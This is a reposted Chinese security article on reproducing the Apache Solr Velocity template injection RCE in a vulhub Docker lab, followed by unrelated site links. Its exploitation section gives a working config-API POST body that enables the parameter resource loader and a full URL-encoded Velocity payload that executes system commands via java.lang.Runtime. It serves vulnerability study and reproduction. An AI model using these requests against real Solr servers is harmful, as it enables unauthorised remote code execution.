Apache Solr Velocity模板注入RCE漏洞复现

0x00 简介


Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。

0x01 漏洞概述


该漏洞的产生是由于两方面的原因:

当攻击者可以直接访问Solr控制台时,可以通过发送类似/节点名/config的POST请求对该节点的配置文件做更改。

Apache Solr默认集成VelocityResponseWriter插件,在该插件的初始化参数中的params.resource.loader.enabled这个选项是用来控制是否允许参数资源加载器在Solr请求参数中指定模版,默认设置是false。 当设置params.resource.loader.enabled为true时,将允许用户通过设置请求中的参数来指定相关资源的加载,这也就意味着攻击者可以通过构造一个具有威胁的攻击请求,在服务器上进行命令执行。(来自360CERT

0x02 影响范围


Apache Solr 5.x - 8.2.0,存在config API版本

0x03 环境搭建


自行搭建:

使用vulhub中CVE-2019-0193的环境进行搭建

启动vulhub环境:

git clone https://github.com/vulhub/vulhub.gitcd vulhub/solr/CVE-2019-0193docker-compose up -d

创建名为test的Core:

docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db

搭建好后默认端口为8983,访问http://ip:8983 即可

0x04 漏洞利用


利用前提:攻击者需要知道Solr服务中Core的名称才能执行攻击

如上图所示的这个名称就是Core的名称

直接构造POST请求,在/solr/test/config目录POST以下数据(修改Core的配置)

{  "update-queryresponsewriter": {    "startup": "lazy",    "name": "velocity",    "class": "solr.VelocityResponseWriter",    "template.base.dir": "",    "solr.resource.loader.enabled": "true",    "params.resource.loader.enabled": "true"  }}

然后使用公开的exp发送请求

http://ip:8983/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

即可成功执行命令

本文分享自微信公众号 - 玄魂工作室(xuanhun521)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-11-03

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏keinYe

使用 Flask 创建 RESTful 服务

依赖完成以后在 server 目录下再新建一个 server 目录作为项目的主目录,第一级 server 目录作为共用配置文件存储目录。

11040
来自专栏测试游记

测试开发进阶(二十五)

LearnDjango/settings.py中添加 'rest_framework'

8630
来自专栏林德熙的博客

win10 uwp 录制任意应用屏幕

在 1803 可以使用 Windows.Graphics.Capture 捕获屏幕,可以用来录制应用的窗口

13230
来自专栏LINUX阅码场

宋宝华: Linux内核编程广泛使用的前向声明(Forward Declaration)

先强调一点:在一切可能的场景,尽可能地使用前向声明(Forward Declaration)。这符合信息隐蔽的原则。

24030
来自专栏雪雁的专栏

[VSCode插件推荐] REST Client: 也许是比Postman更好的选择

我们在VS Code新建一个以.http或者.rest 结尾的文件,填入你的HTTP请求,点击Send Request,或者右键选择Send Request,或...

10010
来自专栏用户5521492的专栏

SpringBoot 实战 | 用 JdbcTemplates 访问 Mysql

如题,今天介绍 springboot 通过jdbc访问关系型mysql,通过 spring 的 JdbcTemplate 去访问。

9730
来自专栏用户5521492的专栏

Java 必知必会的 20 种常用类库和 API

一个有经验的Java开发人员特征之一就是善于使用已有的轮子来造车。《Effective Java》的作者Joshua Bloch曾经说过:“建议使用现有的API...

11420
来自专栏用户5521492的专栏

彻底理解cookie,session,token

1、很久很久以前,Web 基本上就是文档的浏览而已, 既然是浏览,作为服务器, 不需要记录谁在某一段时间里都浏览了什么文档,每次请求都是一个新的HTTP协议, ...

10720
来自专栏用户5521492的专栏

RESTful API 设计规范

它的大原则容易把握,但是细节不容易做对。本文总结 RESTful 的设计细节,介绍如何设计出易于理解和使用的 API。

16830
来自专栏搜云库技术团队

使用 Istio 治理微服务

使用云平台可以为组织提供丰富的好处。然而,不可否认的是,采用云可能会给 DevOps 团队带来压力。开发人员必须使用微服务以满足应用的可移植性,同时运营商管理了...

11020

扫码关注云+社区

领取腾讯云代金券

年度创作总结 领取年终奖励